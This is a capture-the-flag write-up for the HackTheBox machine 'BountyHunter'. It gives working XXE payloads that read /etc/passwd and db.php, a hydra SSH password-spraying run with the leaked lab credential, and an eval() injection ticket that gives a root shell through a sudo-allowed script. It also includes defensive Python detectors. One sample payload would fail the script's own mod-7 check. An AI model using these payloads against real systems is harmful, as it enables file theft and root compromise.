Lluna's Pure land.


HTB-BountyHunter

0x00. Overview

0x01. Information gathering

Only ports 22 and 80 are open.

┌──(root💀kali)-[~/htb/BountyHunter]
└─# nmap -sC -sV -sT 10.10.11.100 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 06:25 EDT
Nmap scan report for 10.10.11.100
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.01 seconds

0x02. Visiting port 80

It is a platform for finding hackers, and it hints at using Burp.

Manually crawling the site turns up a submission panel.

0x03. Directory enumeration

db.php is found; presumably it is a database-related file.

┌──(root💀kali)-[~/htb/vpn]
└─# gobuster dir -u http://10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.100
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/08/15 01:21:23 Starting gobuster in directory enumeration mode
===============================================================
/resources (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/index.php (Status: 200) [Size: 25169]
/assets (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/portal.php (Status: 200) [Size: 125]
/css (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/db.php (Status: 200) [Size: 0]
/js (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]
/server-status (Status: 403) [Size: 277]

===============================================================
2021/08/15 02:15:09 Finished
===============================================================

But requesting it shows no content (the response size is 0).

0x04. Capturing with Burp

Capturing the home page turns up nothing of interest.

Capturing the request to log_submit.php shows that the transmitted data is base64-encoded.

Decoding it shows that the data is sent as XML.

0x05. XML injection (XXE)

Payload:

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<bugreport>
<title>&xxe;</title>
<cwe>demo</cwe>
<cvss>demo</cvss>
<reward>demo</reward>
</bugreport>

Base64-encoded:

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jnh4ZTs8L3RpdGxlPgoJCTxjd2U+ZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M+CgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+

URL-encoded:

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPl0%2bCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2bJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2bZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M%2bCgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ%2bCgkJPC9idWdyZXBvcnQ%2b

The injection succeeds, and the user development shows up in /etc/passwd.
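A defender watching this form would want to look at the submitted data before it reaches the XML parser, because the two transport layers (base64, then URL-encoding) hide the DOCTYPE from anything that only inspects the raw POST body. The Python below is an added example, not code from the box or from this writeup: it peels off both layers, flags a DOCTYPE, an ENTITY declaration or a php:// wrapper (the same wrapper the db.php read in 0x06 relies on), and only parses documents with none of those markers. The form field name data and both sample documents are assumptions constructed for the example.

```python
import base64
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Constructed sample documents (not captured from the box): one bug report
# carrying an external entity declaration, one ordinary report with the same
# element layout the form uses.
XXE_XML = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    '<bugreport><title>&xxe;</title><cwe>demo</cwe>'
    '<cvss>demo</cvss><reward>demo</reward></bugreport>'
)
BENIGN_XML = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<bugreport><title>Stored XSS in profile</title><cwe>79</cwe>'
    '<cvss>6.1</cvss><reward>500</reward></bugreport>'
)

# Markers checked once the transport encoding is peeled off. A bug-report
# submission never needs a DOCTYPE, so any DOCTYPE is treated as suspicious;
# php:// catches the filter-wrapper variant used to pull db.php.
MARKERS = {
    "doctype": re.compile(rb"<!DOCTYPE\b", re.IGNORECASE),
    "entity-declaration": re.compile(rb"<!ENTITY\b", re.IGNORECASE),
    "php-wrapper": re.compile(rb"php://", re.IGNORECASE),
}


def encode_like_client(xml_text: str) -> str:
    """Apply the two layers the writeup shows, base64 then URL-encoding, and
    place the result in a form field named 'data' (field name is an assumption)."""
    b64 = base64.b64encode(xml_text.encode("latin-1")).decode("ascii")
    return "data=" + urllib.parse.quote_plus(b64)


def decode_submission(body: str) -> bytes:
    """Undo both layers and return the raw XML bytes the server would parse."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    b64 = fields.get("data", [""])[0]
    # validate=True rejects stray characters instead of silently dropping them
    return base64.b64decode(b64, validate=True)


def inspect_submission(body: str) -> dict:
    """Return which markers fired and, only if none did, the parsed title.
    xml.etree does not fetch external entities, but the marker check runs
    first so a flagged document never reaches a parser at all."""
    xml_bytes = decode_submission(body)
    flags = [name for name, rx in MARKERS.items() if rx.search(xml_bytes)]
    title = None
    if not flags:
        root = ET.fromstring(xml_bytes)
        title = root.findtext("title")
    return {"flags": flags, "title": title}


if __name__ == "__main__":
    for label, doc in (("xxe", XXE_XML), ("benign", BENIGN_XML)):
        print(label, inspect_submission(encode_like_client(doc)))
```

The decoding order mirrors what the server does, so the same function can be dropped into a request log replay: URL-decode the form field, base64-decode it, then look at the bytes. Matching on the decoded bytes rather than the raw body is the whole point; a rule that greps the POST body for DOCTYPE sees only base64.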

Trying to read /home/development/user.txt fails.

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "file:///home/development/user.txt">]>
<bugreport>
<title>&xxe;</title>
<cwe>demo</cwe>
<cvss>demo</cvss>
<reward>demo</reward>
</bugreport>

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2hvbWUvZGV2ZWxvcG1lbnQvdXNlci50eHQiPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jnh4ZTs8L3RpdGxlPgoJCTxjd2U+ZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M+CgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2hvbWUvZGV2ZWxvcG1lbnQvdXNlci50eHQiPl0%2bCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2bJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2bZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M%2bCgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ%2bCgkJPC9idWdyZXBvcnQ%2b

0x06. Reading db.php

Since db.php was found earlier but could not be viewed, the next step is to retrieve it through the XXE, using the php://filter wrapper so the file comes back base64-encoded.

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">]>
<bugreport>
<title>&xxe;</title>
<cwe>demo</cwe>
<cvss>demo</cvss>
<reward>demo</reward>
</bugreport>

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS92YXIvd3d3L2h0bWwvZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ+CgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmRlbW88L2N3ZT4KCQk8Y3Zzcz5kZW1vPC9jdnNzPgoJCTxyZXdhcmQ+ZGVtbzwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg==

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS92YXIvd3d3L2h0bWwvZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ%2bCgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmRlbW88L2N3ZT4KCQk8Y3Zzcz5kZW1vPC9jdnNzPgoJCTxyZXdhcmQ%2bZGVtbzwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg%3d%3d

Decoding gives the database username and password:

PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

0x07. Brute-forcing SSH

user:development

pass:m19RoAU0hP41A1sTsq6K

┌──(root💀kali)-[~/htb/BountyHunter]
└─# cat passwd.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

┌──(root💀kali)-[~/htb/BountyHunter]
└─# cut -d : -f 1 passwd.txt > userword.txt

┌──(root💀kali)-[~/htb/BountyHunter]
└─# cat userword.txt
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
systemd-network
systemd-resolve
systemd-timesync
messagebus
syslog
_apt
tss
uuidd
tcpdump
landscape
pollinate
sshd
systemd-coredump
development
lxd
usbmux

┌──(root💀kali)-[~/htb/BountyHunter]
└─# hydra -L userword.txt -p m19RoAU0hP41A1sTsq6K 10.10.11.100 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-15 01:55:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 34 login tries (l:34/p:1), ~3 tries per task
[DATA] attacking ssh://10.10.11.100:22/
[22][ssh] host: 10.10.11.100 login: development password: m19RoAU0hP41A1sTsq6K
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-15 01:56:17

SSH login

┌──(root💀kali)-[~/htb/BountyHunter]
└─# ssh development@10.10.11.100
The authenticity of host '10.10.11.100 (10.10.11.100)' can't be established.
ECDSA key fingerprint is SHA256:3IaCMSdNq0Q9iu+vTawqvIf84OO0+RYNnsDxDBZI04Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.100' (ECDSA) to the list of known hosts.
development@10.10.11.100's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 15 Aug 2021 05:39:27 AM UTC

System load: 0.0
Usage of /: 26.5% of 6.83GB
Memory usage: 35%
Swap usage: 0%
Processes: 266
Users logged in: 1
IPv4 address for eth0: 10.10.11.100
IPv6 address for eth0: dead:beef::250:56ff:feb9:66fa


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 15 05:07:51 2021 from 10.10.16.38
-bash-5.0$ pwd
/home/development
-bash-5.0$ ls
code.md contract.txt exploit.md readelf strings user.txt
-bash-5.0$ cat user.txt
**************************************
-bash-5.0$

0x08. Privilege escalation

Escalating via sudo -l

bash-5.0$ sudo -l
Matching Defaults entries for development on bountyhunter:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
bash-5.0$

Auditing ticketValidator.py

bash-5.0$ cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
bash-5.0$
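The script above takes the line after `__Ticket Code:__`, strips the `**`, and, once the first term passes the `% 7 == 4` check, hands the whole line to eval(), which is why a ticket line can carry arbitrary Python and why the sudo rule makes that Python run as root. Below is an added example, not the script from the box, of the same acceptance rules enforced without eval(): the code line must match a strict pattern of integers joined by `+`, the first term must be 4 mod 7, and the sum must exceed 100. The sample tickets are constructed here; the one carrying `__import__` has the shape of the page's demo.md and is rejected instead of executed.

```python
import re

# Strict shape for the line after "__Ticket Code:__": decimal integers joined
# by '+' and wrapped in '**'. Anything else is rejected before any arithmetic,
# so the line is never handed to eval().
TICKET_CODE_RE = re.compile(r"^\*\*(\d+(?:\+\d+)*)\*\*$")


def evaluate_safe(ticket_text: str) -> bool:
    """Same acceptance rules as ticketValidator.py, without eval(): the two
    header lines, then a code line whose first term is 4 mod 7 and whose
    integer sum exceeds 100."""
    lines = ticket_text.splitlines()
    if len(lines) < 2:
        return False
    if not lines[0].startswith("# Skytrain Inc"):
        return False
    if not lines[1].startswith("## Ticket to "):
        return False
    code_line = None
    for i, x in enumerate(lines[2:], start=2):
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line is not None and i == code_line:
            m = TICKET_CODE_RE.match(x.strip())
            if m is None:
                return False  # not a plain integer sum: reject outright
            terms = [int(t) for t in m.group(1).split("+")]
            if terms[0] % 7 == 4:
                return sum(terms) > 100
    return False


# Constructed tickets (not files from the box).
VALID_TICKET = "# Skytrain Inc\n## Ticket to Lluna\n__Ticket Code:__\n**102+5**\n"
LOW_VALUE_TICKET = "# Skytrain Inc\n## Ticket to Lluna\n__Ticket Code:__\n**11+20**\n"
BAD_HEADER_TICKET = "# Someone Else\n## Ticket to Lluna\n__Ticket Code:__\n**102+5**\n"
# Same shape as the page's demo.md; the original script would eval() this line.
INJECTED_TICKET = (
    "# Skytrain Inc\n## Ticket to Lluna\n__Ticket Code:__\n"
    "**18+10+__import__('os').system('/bin/bash')**\n"
)


if __name__ == "__main__":
    samples = {
        "valid": VALID_TICKET,
        "low value": LOW_VALUE_TICKET,
        "bad header": BAD_HEADER_TICKET,
        "injected": INJECTED_TICKET,
    }
    for name, text in samples.items():
        verdict = "Valid ticket." if evaluate_safe(text) else "Invalid ticket."
        print(f"{name}: {verdict}")
```

The regex is the entire hardening: with the line constrained to digits and `+`, int() and sum() are the only operations ever applied to it. The sudo rule is a separate issue; even a fixed validator still runs as root on a user-chosen file path, so the NOPASSWD entry itself is what a defender would want reviewed.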

Build demo.md

# Skytrain Inc
## Ticket to Lluna
__Ticket Code:__
**10+10+__import__('os').system('/bin/bash')**

Or:

# Skytrain Inc
## Ticket to Lluna
__Ticket Code:__
**32+0+__import__('pty').spawn('/bin/bash')**

Escalate

bash-5.0$ pwd
/tmp
bash-5.0$ cat demo.md
# Skytrain Inc
## Ticket to Lluna
__Ticket Code:__
**18+10+__import__('os').system('/bin/bash')**
bash-5.0$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
demo.md
Destination: Lluna
root@bountyhunter:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@bountyhunter:/tmp# cd
root@bountyhunter:~# ls
root.txt snap
root@bountyhunter:~# cat root.txt
******************************************
root@bountyhunter:~#
-------------The paper is short but the feeling is long; see you next time-------------